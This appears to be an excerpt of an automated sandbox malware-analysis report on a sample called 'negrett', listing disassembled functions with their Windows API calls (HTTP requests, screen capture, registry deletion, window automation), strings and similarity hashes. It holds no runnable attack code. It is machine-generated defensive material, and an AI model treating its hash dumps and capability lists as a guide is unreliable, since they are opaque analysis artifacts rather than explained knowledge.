Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00B523B3,000000FF), ref: 00B3016A
Part of subcall function 00B300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B30195
Part of subcall function 00B300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B301A0

___scrt_fastfail.LIBCMT ref: 00B300E7

Part of subcall function 00B300A3: __onexit.LIBCMT ref: 00B300A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B30122
WakeAllConditionVariable, xrefs: 00B30162
SleepConditionVariableCS, xrefs: 00B30154
kernel32.dll, xrefs: 00B30133
InitializeConditionVariable, xrefs: 00B30148

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 8b0de57f539c88ae2ef012c5a44f1228da995e508c61c900fdfe7ade1bf73383
Instruction ID: 6ab868b2e430b83ba30d2c1c9566cb3841b796fe45007b385485289c930c71e0
Opcode Fuzzy Hash: 8b0de57f539c88ae2ef012c5a44f1228da995e508c61c900fdfe7ade1bf73383
Instruction Fuzzy Hash: 49210B32A54B126FD7217BA4AC56B7A77E4DF06F51F2001B5F805F76A1DFB49C008A90

Uniqueness

Uniqueness Score: -1.00%

Function 00B844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000), ref: 00B84527
_wcslen.LIBCMT ref: 00B8453B
_wcslen.LIBCMT ref: 00B84599
_wcslen.LIBCMT ref: 00B845F4
_wcslen.LIBCMT ref: 00B8463F
_wcslen.LIBCMT ref: 00B846A7

Part of subcall function 00B2F9F2: _wcslen.LIBCMT ref: 00B2F9FD

GetDriveTypeW.KERNEL32(?,00BD6BF0,00000061), ref: 00B84743

Strings

all, xrefs: 00B84531, 00B84536
unknown, xrefs: 00B84708
removable, xrefs: 00B845EA, 00B845EF
network, xrefs: 00B8469D, 00B846A2
cdrom, xrefs: 00B8458F, 00B84594
fixed, xrefs: 00B84635, 00B8463A
ramdisk, xrefs: 00B846F1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: a4ecda9022c1d62d10f1294bedd289b7d85145953ad639a5839980e8539dd56b
Instruction ID: 13e87a11154a26e9af9c9c4371ecfa32adf2dc9c9c104693151cfcb43725fde1
Opcode Fuzzy Hash: a4ecda9022c1d62d10f1294bedd289b7d85145953ad639a5839980e8539dd56b
Instruction Fuzzy Hash: 9DB1B0356083039FC710EF28C891AAEB7E5EFA5760F50499DF496872A1E730DD84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00BA6DEB

Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A

CreateWindowExW.USER32 ref: 00BA6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BA6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BA6E94
DestroyWindow.USER32 ref: 00BA6EB5
CreateWindowExW.USER32 ref: 00BA6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BA6EFD
GetDesktopWindow.USER32 ref: 00BA6F16
GetWindowRect.USER32(00000000), ref: 00BA6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BA6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BA6F4D

Part of subcall function 00B29944: GetWindowLongW.USER32(?,000000EB), ref: 00B29952

Strings

tooltips_class32, xrefs: 00BA6E58, 00BA6EDD
0, xrefs: 00BA6D98

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 248407c55ef96d3c61f00049b8cdfc6689bb15fa0c6e8742b4df49a0b27ae3f0
Instruction ID: 9a0fa5a5c3d6f56dce6c684996a7c20853b1f7de2fc5f0e3ca65121a665b648a
Opcode Fuzzy Hash: 248407c55ef96d3c61f00049b8cdfc6689bb15fa0c6e8742b4df49a0b27ae3f0
Instruction Fuzzy Hash: FC717DB4148244AFDB21CF1CDC44FBABBE9FB8A304F58085DF599872A1DB71A906CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B8C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B8C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B8C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B8C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B8C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B8C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B8C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B8C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B8C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B8C5F0
InternetCloseHandle.WININET(00000000), ref: 00B8C5FB

Strings

, xrefs: 00B8C575

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: fe8f6210c1c4a5b87e4f4c442ddf1e06d3fa82be324b93465635701d1fe4e41b
Instruction ID: 3b9ecbf6b93140eb6fcc04801875612274315a59f6f2251f007c76456c403830
Opcode Fuzzy Hash: fe8f6210c1c4a5b87e4f4c442ddf1e06d3fa82be324b93465635701d1fe4e41b
Instruction Fuzzy Hash: C75139B1500608BFEB21AF60C989AAB7FFCFB19754F00446AF94597660DB34E944DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00BA856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00BA8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85AD
CloseHandle.KERNEL32(00000000), ref: 00BA85BA
GlobalLock.KERNEL32 ref: 00BA85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BA85D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85E0
CloseHandle.KERNEL32(00000000), ref: 00BA85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00BA85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00BAFC38,?), ref: 00BA8611
GlobalFree.KERNEL32(00000000), ref: 00BA8621
GetObjectW.GDI32(?,00000018,?), ref: 00BA8641
CopyImage.USER32 ref: 00BA8671
DeleteObject.GDI32(?), ref: 00BA8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BA86AF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2e9e5375d19eca3f3abd56be17d92f19609715ac172c1d88eadb8f3d9911cf1d
Instruction ID: 5b6e35b8ca0c9983f87e7afe6d78bf94f0e8113571df6b6ed30dfac9395310ba
Opcode Fuzzy Hash: 2e9e5375d19eca3f3abd56be17d92f19609715ac172c1d88eadb8f3d9911cf1d
Instruction Fuzzy Hash: 4B41F775600208AFDB119FA9DC89EAA7BF8EF8AB11F144058F905E7260DB309901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B9255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B925E8
CreateCompatibleDC.GDI32(?), ref: 00B925F4
SelectObject.GDI32(00000000,?), ref: 00B92601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B9266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B926D0
SelectObject.GDI32(?,?), ref: 00B926D8
DeleteObject.GDI32(?), ref: 00B926E1
DeleteDC.GDI32(?), ref: 00B926E8
ReleaseDC.USER32(00000000,?), ref: 00B926F3

Strings

(, xrefs: 00B9268D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f49a279dbb5d66223c516b1a2d877dc49cd2379c8ced21b537b24de27ce54ad8
Instruction ID: 1e9f25657a9ec939ac4aab2f52128eee192007f738ed4971b129348d6fa5bc34
Opcode Fuzzy Hash: f49a279dbb5d66223c516b1a2d877dc49cd2379c8ced21b537b24de27ce54ad8
Instruction Fuzzy Hash: 0D61E2B5E00219EFCF15CFA8D885AAEBBF5FF48310F208569E955A7250E770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5F641 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 391COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A5F71F
_wcslen.LIBCMT ref: 02A5F789
_wcslen.LIBCMT ref: 02A5F7F1
_wcslen.LIBCMT ref: 02A5F875

Part of subcall function 029EEDF2: _wcslen.LIBCMT ref: 029EEDFD

Strings

@}L, xrefs: 02A5FA75
0{L, xrefs: 02A5F9E1
|L, xrefs: 02A5F97E
}L, xrefs: 02A5FA27
P|L, xrefs: 02A5F88B
@|L, xrefs: 02A5F807
|L, xrefs: 02A5F79F

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: |L$ }L$0{L$@|L$@}L$P|L$|L
API String ID: 176396367-3207688415
Opcode ID: 8807b4f69262fba17d8f9ff17325311a2a919ab90b44a527380ca82cee991e05
Instruction ID: 441fc02d073ebc5bb492f41630e0da436a5607ee7b2534a8853d29892a8c1eff
Opcode Fuzzy Hash: 8807b4f69262fba17d8f9ff17325311a2a919ab90b44a527380ca82cee991e05
Instruction Fuzzy Hash: 87E19E312082219FCB14DF24C59092BB7E6BFC9758B14895DF896DBBA0DB34ED45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02A0CE5D Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A0CE96
___free_lconv_mon.LIBCMT ref: 02A0CEA1

Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA59
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA6B
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA7D
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA8F
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAA1
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAB3
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAC5
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAD7
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAE9
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAFB
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB0D
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB1F
Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB31

_free.LIBCMT ref: 02A0CEB8
_free.LIBCMT ref: 02A0CECD
_free.LIBCMT ref: 02A0CED8
_free.LIBCMT ref: 02A0CEFA
_free.LIBCMT ref: 02A0CF0D
_free.LIBCMT ref: 02A0CF1B
_free.LIBCMT ref: 02A0CF26
_free.LIBCMT ref: 02A0CF5E
_free.LIBCMT ref: 02A0CF65
_free.LIBCMT ref: 02A0CF82
_free.LIBCMT ref: 02A0CF9A

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
Instruction ID: 54cbac58896de14abd21df6dda23d3eed92f0237ef90de8f5a2bae9613f9e709
Opcode Fuzzy Hash: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
Instruction Fuzzy Hash: 82314A326803059FEB21AB79F9C4B9A77EBAF00325F104A2BE449D71D0DF30A9419F11

Uniqueness

Uniqueness Score: -1.00%

Function 00B74954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00B74994
GetWindowTextW.USER32 ref: 00B749DA
_wcslen.LIBCMT ref: 00B749EB
CharUpperBuffW.USER32(?,00000000), ref: 00B749F7
_wcsstr.LIBVCRUNTIME ref: 00B74A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00B74A64
GetWindowTextW.USER32 ref: 00B74A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00B74AE6
GetClassNameW.USER32(?,?,00000400), ref: 00B74B20
GetWindowRect.USER32(?,?), ref: 00B74B8B

Strings

ThumbnailClass, xrefs: 00B74A6F, 00B74AF1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 18bff6d170f578e1a45565be09e3dc6ff46bb1cbdd7c24691ee378c47a452146
Instruction ID: 1af71e531f21094e26f61abf196aeafcc0b0f2c41fc4d07b6eff3127b9b03646
Opcode Fuzzy Hash: 18bff6d170f578e1a45565be09e3dc6ff46bb1cbdd7c24691ee378c47a452146
Instruction Fuzzy Hash: 8691CF310082059FDB15DF14C981BAAB7E8FF84315F0484AAFDA99B196DB30ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B29BB2

PostMessageW.USER32 ref: 00BA8D5A
GetFocus.USER32 ref: 00BA8D6A
GetDlgCtrlID.USER32 ref: 00BA8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00BA8E1D
GetMenuItemInfoW.USER32 ref: 00BA8ECF
GetMenuItemCount.USER32(?), ref: 00BA8EEC
GetMenuItemID.USER32(?,00000000), ref: 00BA8EFC
GetMenuItemInfoW.USER32 ref: 00BA8F2E
GetMenuItemInfoW.USER32 ref: 00BA8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BA8FA1

Strings

0, xrefs: 00BA8E9F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 94bfea7f9204cd4989c09b20edb8a5b5a3ea20b6e16ca1dec60505925c733886
Instruction ID: 837e730344168b9c78ff1472fc3d57ae002264c730428ff7241580ce29019558
Opcode Fuzzy Hash: 94bfea7f9204cd4989c09b20edb8a5b5a3ea20b6e16ca1dec60505925c733886
Instruction Fuzzy Hash: B781BF71508301AFDB10CF24D885AABBBE9FF8A314F1409ADF98997691DF31D900CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B9CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B9CC64
RegOpenKeyExW.ADVAPI32 ref: 00B9CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B9CD48

Part of subcall function 00B9CC34: RegCloseKey.ADVAPI32(?), ref: 00B9CCAA
Part of subcall function 00B9CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B9CCBD
Part of subcall function 00B9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00B9CCCF
Part of subcall function 00B9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B9CD05
Part of subcall function 00B9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B9CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B9CCF3

Strings

RegDeleteKeyExW, xrefs: 00B9CCC9
advapi32.dll, xrefs: 00B9CCB8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: fed612ace47f82d9d5c0d059fa52c0b91ae287a15cd86c8eabb6c6862333a357
Instruction ID: 2d0538b8019422c63242b4597708717df1ee23482296d813249e5572e629ec4b
Opcode Fuzzy Hash: fed612ace47f82d9d5c0d059fa52c0b91ae287a15cd86c8eabb6c6862333a357
Instruction Fuzzy Hash: EC316C71A41129BBDB208B55DC89EFFBFBCEF46750F0001B5E906E3250DB349E459AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B7E6B4

Part of subcall function 00B2E551: timeGetTime.WINMM ref: 00B2E555

Sleep.KERNEL32(0000000A), ref: 00B7E6E1
EnumThreadWindows.USER32 ref: 00B7E705
FindWindowExW.USER32 ref: 00B7E727
SetActiveWindow.USER32 ref: 00B7E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B7E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B7E773
Sleep.KERNEL32(000000FA), ref: 00B7E77E
IsWindow.USER32 ref: 00B7E78A
EndDialog.USER32 ref: 00B7E79B

Strings

BUTTON, xrefs: 00B7E719

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b876ec2d7bf2d32cd704aa5a22f87abbf8db3deaf59c32d86064e7c13e88cd65
Instruction ID: 8004b99288d6bb0145eb3ddd3b689e21849b4402e0b2385251a6bb8753280f48
Opcode Fuzzy Hash: b876ec2d7bf2d32cd704aa5a22f87abbf8db3deaf59c32d86064e7c13e88cd65
Instruction Fuzzy Hash: 69216270200245AFEB005F24ECCAA253FEDEF5A749B1084A5F53D871B1DFB1EC009A24

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B7EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B7EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B7EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B7EAA7

Strings

close PlayMe, xrefs: 00B7EA6E, 00B7EA9B
open , xrefs: 00B7EA0C
play PlayMe, xrefs: 00B7EAA2
alias PlayMe, xrefs: 00B7EA36
status PlayMe mode, xrefs: 00B7EA58
play PlayMe wait, xrefs: 00B7EA91

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: fe9a6bfbb7fc7764a42a59638cbdce9a5f6e981cb3420cf57df67f7f634bd72b
Instruction ID: 719932d15d26f530c8e7ee59c6103b0a7820b30664209a056c254343bbd09ff1
Opcode Fuzzy Hash: fe9a6bfbb7fc7764a42a59638cbdce9a5f6e981cb3420cf57df67f7f634bd72b
Instruction Fuzzy Hash: 39119131A5025979D720A7A1DC5ADFFABFCEFD5B40F4004AAB821A20E0EEB05945C5B0

Uniqueness

Uniqueness Score: -1.00%

